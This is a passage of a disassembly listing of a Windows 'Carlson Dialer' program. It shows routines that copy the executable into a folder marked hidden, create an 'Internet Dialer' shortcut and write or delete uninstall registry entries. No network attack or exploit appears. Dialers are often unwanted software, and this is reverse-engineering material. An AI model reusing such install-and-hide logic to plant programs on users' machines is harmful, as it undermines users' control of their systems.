loc_402F90: ; CODE XREF: sub_402F50+38�j
mov [esi+4], eax
mov eax, [esi+8]
lea ecx, ds:0[eax*4]
mov eax, [esi]
add eax, ecx
jz short loc_402FAB
mov edx, [esp+4+arg_0]
mov edx, [edx]
mov [eax], edx
loc_402FAB: ; CODE XREF: sub_402F50+51�j
mov eax, [esi+4]
add eax, ecx
jz short loc_402FBA
mov ecx, [esp+4+arg_4]
mov edx, [ecx]
mov [eax], edx
loc_402FBA: ; CODE XREF: sub_402F50+60�j
inc dword ptr [esi+8]
mov eax, 1
pop esi
retn 8
sub_402F50 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_402FD0(size_t Size)
sub_402FD0 proc near ; CODE XREF: sub_404CD0+152�p
Size = dword ptr 4
mov eax, [esp+Size]
cmp eax, 400h
push esi
mov esi, ecx
jbe short loc_402FEA
push eax ; Size
call sub_401CE0
mov eax, [esi]
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_402FEA: ; CODE XREF: sub_402FD0+C�j
lea eax, [esi+4]
mov [esi], eax
pop esi
retn 4
sub_402FD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_403000(size_t Size)
sub_403000 proc near ; CODE XREF: sub_403D70+CF�p
; sub_403D70+2A1�p
Size = dword ptr 4
mov eax, [esp+Size]
cmp eax, 100h
push esi
mov esi, ecx
jbe short loc_40301A
push eax ; Size
call sub_401CE0
mov eax, [esi]
pop esi
retn 4
; ---------------------------------------------------------------------------
loc_40301A: ; CODE XREF: sub_403000+C�j
lea eax, [esi+4]
mov [esi], eax
pop esi
retn 4
sub_403000 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_403030 proc near ; CODE XREF: sub_404B20+13�p
mov eax, [ecx+14h]
test eax, eax
jz short locret_403047
push eax
push 0
call ds:dword_40F07C ; GetProcessHeap
push eax
call ds:dword_40F078 ; RtlFreeHeap
locret_403047: ; CODE XREF: sub_403030+5�j
retn
sub_403030 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __thiscall sub_403050(void *Memory,char)
sub_403050 proc near ; DATA XREF: .rdata:off_40F590�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
push edi
lea edi, [esi+4]
jz short loc_40308F
mov eax, [esi+0Ch]
test eax, eax
jz short loc_403072
push edi
call sub_401BB0
mov dword ptr [esi+0Ch], 0
loc_403072: ; CODE XREF: sub_403050+13�j
mov eax, [esi+28h]
test eax, eax
jz short loc_40307F
mov ecx, [eax]
push eax
call dword ptr [ecx+8]
loc_40307F: ; CODE XREF: sub_403050+27�j
lea edx, [esi+10h]
push edx
call ds:dword_40F054 ; RtlDeleteCriticalSection
mov dword ptr [edi], 0
loc_40308F: ; CODE XREF: sub_403050+C�j
test [esp+8+arg_0], 1
jz short loc_40309F
push esi ; Memory
call j__free
add esp, 4
loc_40309F: ; CODE XREF: sub_403050+44�j
pop edi
mov eax, esi
pop esi
retn 4
sub_403050 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4030B0 proc near ; CODE XREF: sub_403350+64D�p
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
Memory = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
arg_0 = dword ptr 4
sub esp, 34h
push ebx
push ebp
mov ebp, [esp+3Ch+arg_0]
push esi
xor ebx, ebx
push 71h
push ebp
lea ecx, [esp+48h+var_2C]
mov esi, eax
mov [esp+48h+var_2C], ebx
mov [esp+48h+Memory], ebx
mov [esp+48h+var_24], ebx
mov [esp+48h+var_20], bl
mov [esp+48h+var_2], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+44h+var_2C]
call sub_402310
push 7Ah
push ebp
lea ecx, [esp+48h+var_2C]
call sub_40A1E0
lea eax, [esp+40h+var_30]
push eax
lea ecx, [esp+44h+var_34]
push ecx
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
lea ecx, [esp+5Ch+var_2C]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz short loc_40317A
mov eax, esi
lea edx, [eax+1]
lea esp, [esp+0]
loc_403130: ; CODE XREF: sub_4030B0+85�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403130
sub eax, edx
mov edx, [esp+40h+var_34]
push eax
push esi
mov esi, ds:dword_40F010
push 1
push ebx
push offset aUninstexe ; "uninstExe"
push edx
call esi ; RegSetValueExA
mov eax, edi
lea ecx, [eax+1]
loc_403155: ; CODE XREF: sub_4030B0+AA�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_403155
sub eax, ecx
push eax
mov eax, [esp+44h+var_34]
push edi
push 1
push ebx
push offset aUninstshortcut ; "uninstShortcut"
push eax
call esi ; RegSetValueExA
mov ecx, [esp+40h+var_34]
push ecx
call ds:dword_40F020 ; RegCloseKey
loc_40317A: ; CODE XREF: sub_4030B0+72�j
mov eax, [esp+40h+Memory]
cmp eax, ebx
jz short loc_40318F
push eax ; Memory
call _free
add esp, 4
mov [esp+40h+Memory], ebx
loc_40318F: ; CODE XREF: sub_4030B0+D0�j
mov edx, [esp+40h+var_2C]
push edx
call ds:dword_40F194
pop esi
pop ebp
pop ebx
add esp, 34h
retn
sub_4030B0 endp
; ---------------------------------------------------------------------------
align 10h
loc_4031B0: ; CODE XREF: WinMain(x,x,x,x)+148�p
sub esp, 93Ch
push ebx
push esi
xor ebx, ebx
mov esi, eax
push 71h
push esi
lea ecx, [esp+20h]
mov [esp+20h], ebx
mov [esp+24h], ebx
mov [esp+28h], ebx
mov [esp+2Ch], bl
mov [esp+4Ah], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+1Ch]
call sub_402310
push 7Ah
push esi
lea ecx, [esp+20h]
call sub_40A1E0
lea eax, [esp+0Ch]
push eax
push 20019h
push ebx
lea ecx, [esp+24h]
call sub_409F60
push eax
push 80000001h
call ds:dword_40F00C ; RegOpenKeyExA
test eax, eax
jnz loc_4032FB
mov eax, [esp+0Ch]
mov esi, ds:dword_40F01C
lea ecx, [esp+8]
push ecx
push ebx
lea edx, [esp+18h]
push edx
push ebx
push offset aUninstexe ; "uninstExe"
push eax
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_403283
lea ecx, [esp+8]
push ecx
mov ecx, [esp+10h]
lea edx, [esp+48h]
push edx
lea eax, [esp+18h]
push eax
push ebx
push offset aUninstexe ; "uninstExe"
push ecx
call esi ; RegQueryValueExA
mov edx, [esp+8]
push edx
lea eax, [esp+48h]
push eax
lea ecx, [esp+54Ch]
push ecx
call _strncpy
mov edx, [esp+14h]
add esp, 0Ch
mov [esp+edx+544h], bl
jmp short loc_40328A
; ---------------------------------------------------------------------------
loc_403283: ; CODE XREF: .text:0040323E�j
mov [esp+544h], bl
loc_40328A: ; CODE XREF: .text:00403281�j
mov edx, [esp+0Ch]
lea eax, [esp+8]
push eax
push ebx
lea ecx, [esp+18h]
push ecx
push ebx
push offset aUninstshortcut ; "uninstShortcut"
push edx
call esi ; RegQueryValueExA
test eax, eax
jnz short loc_4032E9
lea eax, [esp+8]
push eax
mov eax, [esp+10h]
lea ecx, [esp+48h]
push ecx
lea edx, [esp+18h]
push edx
push ebx
push offset aUninstshortcut ; "uninstShortcut"
push eax
call esi ; RegQueryValueExA
mov ecx, [esp+8]
push ecx
lea edx, [esp+48h]
push edx
lea eax, [esp+14Ch]
push eax
call _strncpy
mov ecx, [esp+14h]
add esp, 0Ch
mov [esp+ecx+144h], bl
jmp short loc_4032F0
; ---------------------------------------------------------------------------
loc_4032E9: ; CODE XREF: .text:004032A4�j
mov [esp+144h], bl
loc_4032F0: ; CODE XREF: .text:004032E7�j
mov edx, [esp+0Ch]
push edx
call ds:dword_40F020 ; RegCloseKey
loc_4032FB: ; CODE XREF: .text:00403218�j
lea eax, [esp+144h]
lea edx, [eax+1]
loc_403305: ; CODE XREF: .text:0040330A�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_403305
sub eax, edx
mov [esp+14h], eax
jz short loc_403322
lea eax, [esp+144h]
push eax
call ds:dword_40F0B0 ; DeleteFileA
loc_403322: ; CODE XREF: .text:00403312�j
lea ecx, [esp+18h]
call sub_409F60
mov esi, ds:dword_40F008
push eax
push 80000001h
call esi ; RegDeleteKeyA
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call esi ; RegDeleteKeyA
push ebx
call _exit ; _exit
; ---------------------------------------------------------------------------
db 5Eh
dd 0CCCCCC5Bh
; =============== S U B R O U T I N E =======================================
sub_403350 proc near ; CODE XREF: WinMain(x,x,x,x)+154�p
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_13A = byte ptr -13Ah
var_138 = dword ptr -138h
Memory = dword ptr -134h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_10E = byte ptr -10Eh
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = dword ptr -104h
var_100 = byte ptr -100h
var_E2 = byte ptr -0E2h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = byte ptr -0D4h
var_B6 = byte ptr -0B6h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = byte ptr -0A8h
var_8A = byte ptr -8Ah
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = byte ptr -7Ch
var_5E = byte ptr -5Eh
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_32 = byte ptr -32h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_2 = byte ptr -2
arg_0 = dword ptr 4
sub esp, 170h
push ebx
xor ebx, ebx
push ebp
push esi
push edi
mov edi, [esp+180h+arg_0]
push 71h
push edi
lea ecx, [esp+188h+var_2C]
mov esi, eax
mov [esp+188h+var_10C], ebx
mov [esp+188h+var_108], ebx
mov [esp+188h+var_104], ebx
mov [esp+188h+var_100], bl
mov [esp+188h+var_E2], bl
mov [esp+188h+var_B4], ebx
mov [esp+188h+var_B0], ebx
mov [esp+188h+var_AC], ebx
mov [esp+188h+var_A8], bl
mov [esp+188h+var_8A], bl
mov [esp+188h+var_2C], ebx
mov [esp+188h+var_28], ebx
mov [esp+188h+var_24], ebx
mov [esp+188h+var_20], bl
mov [esp+188h+var_2], bl
call sub_401DD0
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+184h+var_2C]
call sub_402310
push 7Ah
push edi
lea ecx, [esp+188h+var_2C]
call sub_40A1E0
cmp byte ptr [esi], 22h
jnz short loc_403400
inc esi
loc_403400: ; CODE XREF: sub_403350+AD�j
mov cl, [esi]
cmp cl, bl
mov eax, esi
jz short loc_403415
loc_403408: ; CODE XREF: sub_403350+C3�j
cmp cl, 22h
jz short loc_403415
mov cl, [eax+1]
inc eax
cmp cl, bl
jnz short loc_403408
loc_403415: ; CODE XREF: sub_403350+B6�j
; sub_403350+BB�j
sub eax, esi
push eax
push esi
lea ecx, [esp+188h+var_88]
mov [esp+188h+var_88], ebx
mov [esp+188h+var_84], ebx
mov [esp+188h+var_80], ebx
mov [esp+188h+var_7C], bl
mov [esp+188h+var_5E], bl
call sub_40A260
push 7Ah
push edi
lea ecx, [esp+188h+var_5C]
mov [esp+188h+var_5C], ebx
mov [esp+188h+var_58], ebx
mov [esp+188h+var_54], ebx
mov [esp+188h+var_50], bl
mov [esp+188h+var_32], bl
call sub_401DD0
push 2Bh
lea ecx, [esp+184h+var_E0]
mov [esp+184h+var_E0], ebx
mov [esp+184h+var_DC], ebx
mov [esp+184h+var_D8], ebx
mov [esp+184h+var_D4], bl
mov [esp+184h+var_B6], bl
call sub_40A3B0
cmp al, 1
jz short loc_403501
push 26h
lea ecx, [esp+184h+var_E0]
call sub_40A3B0
cmp al, 1
jz short loc_403501
mov eax, off_4120D0
mov ecx, off_4120CC
push eax
push ecx
push 80000002h
lea ecx, [esp+18Ch+var_E0]
call sub_40A2B0
cmp al, 1
jz short loc_403501
cmp byte ptr [esi+1], 3Ah
lea ecx, [esp+180h+var_E0]
jnz short loc_4034FA
push 3
push esi
call sub_40A260
jmp short loc_403512
; ---------------------------------------------------------------------------
loc_4034FA: ; CODE XREF: sub_403350+19E�j
push offset aC ; "c:\\"
jmp short loc_40350D
; ---------------------------------------------------------------------------
loc_403501: ; CODE XREF: sub_403350+15D�j
; sub_403350+16F�j ...
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+184h+var_E0]
loc_40350D: ; CODE XREF: sub_403350+1AF�j
call sub_402310
loc_403512: ; CODE XREF: sub_403350+1A8�j
mov ebp, ds:dword_40F194
mov [esp+180h+var_164], ebx
mov [esp+180h+var_160], ebx
mov [esp+180h+var_15C], ebx
mov byte ptr [esp+180h+var_158], bl
mov [esp+180h+var_13A], bl
mov [esp+180h+var_168], ebx
mov edi, ebx
loc_403532: ; CODE XREF: sub_403350+42A�j
mov edx, [esp+180h+var_164]
push edx
call ebp
mov eax, [esp+180h+var_E0]
cmp eax, ebx
mov [esp+180h+var_164], ebx
jz short loc_40356B
lea ecx, [esp+180h+var_170]
push ecx
push eax
push ebx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_40356B
mov edx, [esp+180h+var_164]
push edx
call ebp
mov eax, [esp+180h+var_170]
mov [esp+180h+var_164], eax
loc_40356B: ; CODE XREF: sub_403350+1F6�j
; sub_403350+20A�j
mov eax, off_4120D4
cmp eax, ebx
jz short loc_4035B7
push eax
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_40358D
push ebx
jmp short loc_4035B5
; ---------------------------------------------------------------------------
loc_40358D: ; CODE XREF: sub_403350+238�j
mov edx, [esp+180h+var_164]
lea ecx, [esp+180h+var_170]
push ecx
push esi
push edx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4035B4
mov eax, [esp+180h+var_164]
push eax
call ebp
mov ecx, [esp+180h+var_170]
mov [esp+180h+var_164], ecx
loc_4035B4: ; CODE XREF: sub_403350+253�j
push esi
loc_4035B5: ; CODE XREF: sub_403350+23B�j
call ebp
loc_4035B7: ; CODE XREF: sub_403350+222�j
cmp edi, ebx
jle short loc_40360C
push offset a_ ; "."
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_4035D8
push ebx
jmp short loc_403600
; ---------------------------------------------------------------------------
loc_4035D8: ; CODE XREF: sub_403350+283�j
mov eax, [esp+180h+var_164]
lea edx, [esp+180h+var_170]
push edx
push esi
push eax
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4035FF
mov ecx, [esp+180h+var_164]
push ecx
call ebp
mov edx, [esp+180h+var_170]
mov [esp+180h+var_164], edx
loc_4035FF: ; CODE XREF: sub_403350+29E�j
push esi
loc_403600: ; CODE XREF: sub_403350+286�j
call ebp
push edi
lea ecx, [esp+184h+var_164]
call sub_40A480
loc_40360C: ; CODE XREF: sub_403350+269�j
lea ecx, [esp+180h+var_164]
call sub_409F60
mov esi, ds:dword_40F16C
push eax
call esi ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_40364B
lea ecx, [esp+180h+var_164]
call sub_409F60
push eax
call sub_40AF44
add esp, 4
test eax, eax
jnz loc_403772
lea ecx, [esp+180h+var_164]
call sub_409F60
push eax
call esi ; GetFileAttributesA
jmp short loc_403653
; ---------------------------------------------------------------------------
loc_40364B: ; CODE XREF: sub_403350+2D1�j
test al, 10h
jz loc_403772
loc_403653: ; CODE XREF: sub_403350+2F9�j
or eax, 2
push eax
lea ecx, [esp+184h+var_164]
call sub_409F60
push eax
call ds:dword_40F0BC ; SetFileAttributesA
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_403684
push ebx
jmp short loc_4036AC
; ---------------------------------------------------------------------------
loc_403684: ; CODE XREF: sub_403350+32F�j
mov ecx, [esp+180h+var_164]
lea eax, [esp+180h+var_170]
push eax
push esi
push ecx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4036AB
mov edx, [esp+180h+var_164]
push edx
call ebp
mov eax, [esp+180h+var_170]
mov [esp+180h+var_164], eax
loc_4036AB: ; CODE XREF: sub_403350+34A�j
push esi
loc_4036AC: ; CODE XREF: sub_403350+332�j
call ebp
mov edi, [esp+180h+var_5C]
cmp edi, ebx
jz short loc_4036E0
mov edx, [esp+180h+var_164]
lea ecx, [esp+180h+var_170]
push ecx
push edi
push edx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4036E0
mov eax, [esp+180h+var_164]
push eax
call ebp
mov ecx, [esp+180h+var_170]
mov [esp+180h+var_164], ecx
loc_4036E0: ; CODE XREF: sub_403350+367�j
; sub_403350+37F�j
push offset a_exe ; ".exe"
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_4036FD
push ebx
jmp short loc_403725
; ---------------------------------------------------------------------------
loc_4036FD: ; CODE XREF: sub_403350+3A8�j
mov eax, [esp+180h+var_164]
lea edx, [esp+180h+var_170]
push edx
push esi
push eax
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_403724
mov ecx, [esp+180h+var_164]
push ecx
call ebp
mov edx, [esp+180h+var_170]
mov [esp+180h+var_164], edx
loc_403724: ; CODE XREF: sub_403350+3C3�j
push esi
loc_403725: ; CODE XREF: sub_403350+3AB�j
call ebp
lea ecx, [esp+180h+var_88]
call sub_409F60
lea ecx, [esp+180h+var_164]
mov esi, eax
call sub_409F60
push eax
push esi
call ds:dword_40F0B8 ; lstrcmp
test eax, eax
jz short loc_4037A7
lea ecx, [esp+180h+var_88]
call sub_409F60
push ebx
lea ecx, [esp+184h+var_164]
mov esi, eax
call sub_409F60
push eax
push esi
call ds:dword_40F0B4 ; CopyFileA
test eax, eax
jnz short loc_403789
mov edi, [esp+180h+var_168]
loc_403772: ; CODE XREF: sub_403350+2E7�j
; sub_403350+2FD�j
inc edi
cmp edi, 0Ah
mov [esp+180h+var_168], edi
jl loc_403532
mov edi, [esp+180h+var_5C]
jmp short loc_4037A7
; ---------------------------------------------------------------------------
loc_403789: ; CODE XREF: sub_403350+41C�j
mov eax, [esp+180h+var_10C]
push eax
call ebp
lea ecx, [esp+180h+var_164]
mov [esp+180h+var_10C], ebx
call sub_409F60
push eax
lea ecx, [esp+184h+var_10C]
call sub_402310
loc_4037A7: ; CODE XREF: sub_403350+3F8�j
; sub_403350+437�j
cmp [esp+180h+var_168], 9
jle short loc_4037E7
mov ecx, [esp+180h+var_164]
push ecx
call ebp
mov eax, [esp+180h+var_88]
cmp eax, ebx
mov [esp+180h+var_164], ebx
jz short loc_4037E7
lea edx, [esp+180h+var_170]
push edx
push eax
push ebx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4037E7
mov eax, [esp+180h+var_164]
push eax
call ebp
mov ecx, [esp+180h+var_170]
mov [esp+180h+var_164], ecx
loc_4037E7: ; CODE XREF: sub_403350+45C�j
; sub_403350+472�j ...
push 16h
lea ecx, [esp+184h+var_138]
mov [esp+184h+var_138], ebx
mov [esp+184h+Memory], ebx
mov [esp+184h+var_130], ebx
mov [esp+184h+var_12C], bl
mov [esp+184h+var_10E], bl
call sub_40A3B0
cmp al, 1
jz short loc_403837
push 0Bh
lea ecx, [esp+184h+var_138]
call sub_40A3B0
cmp al, 1
jz short loc_403837
mov edx, off_4120B4
mov eax, off_4120AC
push edx
push eax
lea ecx, [esp+188h+var_138]
call sub_40A390
cmp al, 1
jnz loc_403972
loc_403837: ; CODE XREF: sub_403350+4B8�j
; sub_403350+4C7�j
push offset asc_40F5D4 ; "\\"
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_403854
push ebx
jmp short loc_40387C
; ---------------------------------------------------------------------------
loc_403854: ; CODE XREF: sub_403350+4FF�j
mov edx, [esp+180h+var_138]
lea ecx, [esp+180h+var_170]
push ecx
push esi
push edx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_40387B
mov eax, [esp+180h+var_138]
push eax
call ebp
mov ecx, [esp+180h+var_170]
mov [esp+180h+var_138], ecx
loc_40387B: ; CODE XREF: sub_403350+51A�j
push esi
loc_40387C: ; CODE XREF: sub_403350+502�j
call ebp
cmp edi, ebx
jz short loc_4038A9
mov eax, [esp+180h+var_138]
lea edx, [esp+180h+var_170]
push edx
push edi
push eax
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4038A9
mov ecx, [esp+180h+var_138]
push ecx
call ebp
mov edx, [esp+180h+var_170]
mov [esp+180h+var_138], edx
loc_4038A9: ; CODE XREF: sub_403350+530�j
; sub_403350+548�j
push offset a_lnk ; ".lnk"
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_4038C6
push ebx
jmp short loc_4038EE
; ---------------------------------------------------------------------------
loc_4038C6: ; CODE XREF: sub_403350+571�j
mov ecx, [esp+180h+var_138]
lea eax, [esp+180h+var_170]
push eax
push esi
push ecx
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_4038ED
mov edx, [esp+180h+var_138]
push edx
call ebp
mov eax, [esp+180h+var_170]
mov [esp+180h+var_138], eax
loc_4038ED: ; CODE XREF: sub_403350+58C�j
push esi
loc_4038EE: ; CODE XREF: sub_403350+574�j
call ebp
push offset aInternetDialer ; "Internet Dialer"
lea ecx, [esp+184h+var_164]
call sub_409F60
push eax
lea ecx, [esp+188h+var_138]
call sub_40A110
mov ecx, [esp+180h+var_B4]
push ecx
call ebp
lea ecx, [esp+180h+var_138]
mov [esp+180h+var_B4], ebx
call sub_409F60
cmp eax, ebx
jz short loc_403972
push eax
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_40393F
push ebx
jmp short loc_403970
; ---------------------------------------------------------------------------
loc_40393F: ; CODE XREF: sub_403350+5EA�j
mov eax, [esp+180h+var_B4]
lea edx, [esp+180h+var_170]
push edx
push esi
push eax
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_40396F
mov ecx, [esp+180h+var_B4]
push ecx
call ebp
mov edx, [esp+180h+var_170]
mov [esp+180h+var_B4], edx
loc_40396F: ; CODE XREF: sub_403350+608�j
push esi
loc_403970: ; CODE XREF: sub_403350+5ED�j
call ebp
loc_403972: ; CODE XREF: sub_403350+4E1�j
; sub_403350+5D4�j
cmp ds:byte_40F7FB, bl
jz short loc_4039AC
lea ecx, [esp+180h+var_10C]
call sub_409F60
lea ecx, [esp+180h+var_B4]
mov esi, eax
call sub_409F60
mov ecx, [esp+180h+arg_0]
mov edi, eax
push ecx
mov eax, esi
call sub_4030B0
mov edi, [esp+184h+var_5C]
add esp, 4
loc_4039AC: ; CODE XREF: sub_403350+628�j
lea edx, [esp+180h+var_30]
push edx
lea eax, [esp+184h+var_16C]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov [esp+1A4h+var_16C], ebx
call ds:dword_40F000 ; RegCreateKeyExA
test eax, eax
jnz loc_403A8C
mov eax, offset aCarlsonDialer ; "Carlson Dialer"
lea edx, [eax+1]
loc_4039E6: ; CODE XREF: sub_403350+69B�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_4039E6
mov ecx, [esp+180h+var_16C]
mov edi, ds:dword_40F010
sub eax, edx
push eax
push offset aCarlsonDialer ; "Carlson Dialer"
push 1
push ebx
push offset aDisplayname ; "DisplayName"
push ecx
call edi ; RegSetValueExA
push offset aU ; " -u"
lea ecx, [esp+184h+var_170]
mov [esp+184h+var_170], ebx
call sub_401E30
mov esi, [esp+180h+var_170]
cmp esi, ebx
jnz short loc_403A27
push ebx
jmp short loc_403A4F
; ---------------------------------------------------------------------------
loc_403A27: ; CODE XREF: sub_403350+6D2�j
mov eax, [esp+180h+var_10C]
lea edx, [esp+180h+var_170]
push edx
push esi
push eax
mov [esp+18Ch+var_170], ebx
call sub_40A570
test eax, eax
jl short loc_403A4E
mov ecx, [esp+180h+var_10C]
push ecx
call ebp
mov edx, [esp+180h+var_170]
mov [esp+180h+var_10C], edx
loc_403A4E: ; CODE XREF: sub_403350+6ED�j
push esi
loc_403A4F: ; CODE XREF: sub_403350+6D5�j
call ebp
lea ecx, [esp+180h+var_10C]
call sub_409F60
mov ecx, eax
lea esi, [ecx+1]
nop
loc_403A60: ; CODE XREF: sub_403350+715�j
mov dl, [ecx]
inc ecx
cmp dl, bl
jnz short loc_403A60
sub ecx, esi
push ecx
push eax
mov eax, [esp+188h+var_16C]
push 1
push ebx
push offset aUninstallstrin ; "UninstallString"
push eax
call edi ; RegSetValueExA
mov ecx, [esp+180h+var_16C]
push ecx
call ds:dword_40F020 ; RegCloseKey
mov edi, [esp+180h+var_5C]
loc_403A8C: ; CODE XREF: sub_403350+688�j
push ebx
push ebx
push ebx
push 7FFFFFFFh
call ds:dword_40F1A8
mov eax, [esp+180h+Memory]
cmp eax, ebx
jz short loc_403AAF
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+Memory], ebx
loc_403AAF: ; CODE XREF: sub_403350+750�j
mov edx, [esp+180h+var_138]
push edx
call ebp
mov eax, [esp+180h+var_160]
cmp eax, ebx
jz short loc_403ACB
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+var_160], ebx
loc_403ACB: ; CODE XREF: sub_403350+76C�j
mov eax, [esp+180h+var_164]
push eax
call ebp
mov eax, [esp+180h+var_DC]
cmp eax, ebx
jz short loc_403AED
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+var_DC], ebx
loc_403AED: ; CODE XREF: sub_403350+78B�j
mov ecx, [esp+180h+var_E0]
push ecx
call ebp
mov eax, [esp+180h+var_58]
cmp eax, ebx
jz short loc_403B0B
push eax ; Memory
call _free
add esp, 4
loc_403B0B: ; CODE XREF: sub_403350+7B0�j
push edi
call ebp
mov eax, [esp+180h+var_84]
cmp eax, ebx
jz short loc_403B29
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+var_84], ebx
loc_403B29: ; CODE XREF: sub_403350+7C7�j
mov edx, [esp+180h+var_88]
push edx
call ebp
push ebx
call ebp
mov eax, [esp+180h+var_28]
cmp eax, ebx
jz short loc_403B51
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+var_28], ebx
loc_403B51: ; CODE XREF: sub_403350+7EF�j
mov eax, [esp+180h+var_2C]
push eax
call ebp
mov eax, [esp+180h+var_B0]
cmp eax, ebx
jz short loc_403B76
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+var_B0], ebx
loc_403B76: ; CODE XREF: sub_403350+814�j
mov ecx, [esp+180h+var_B4]
push ecx
call ebp
mov eax, [esp+180h+var_108]
cmp eax, ebx
jz short loc_403B95
push eax ; Memory
call _free
add esp, 4
mov [esp+180h+var_108], ebx
loc_403B95: ; CODE XREF: sub_403350+836�j
mov edx, [esp+180h+var_10C]
push edx
call ebp
pop edi
pop esi
pop ebp
pop ebx
add esp, 170h
retn
sub_403350 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_403BB0(void *Memory,int)
sub_403BB0 proc near ; CODE XREF: sub_403CA0+94�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Memory = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebp
push esi
mov esi, [esp+14h+Memory]
test esi, esi
mov [esp+14h+var_4], ecx
jz loc_403C87
mov ebp, [esp+14h+arg_4]
test ebp, ebp
jz loc_403C87
push ebx
push edi
push esi
mov [esp+20h+var_C], 0
call ds:dword_40F084 ; lstrlen
mov edi, eax
inc edi
push edi ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
add esp, 4
mov ebx, eax
push ebp
mov [esp+20h+var_8], ebx
call ds:dword_40F040 ; lstrlenW
lea ebp, [eax+eax+2]
lea eax, [ebp+ebp+0]
push eax ; unsigned int
call j_??2@YAPAXI@Z ; operator new(uint)
add esp, 4
test ebx, ebx
mov [esp+1Ch+Memory], eax
jz short loc_403C57
test eax, eax
jz short loc_403C57
mov ecx, edi
mov edx, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov esi, [esp+1Ch+arg_4]
mov edi, eax
mov ecx, ebp
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
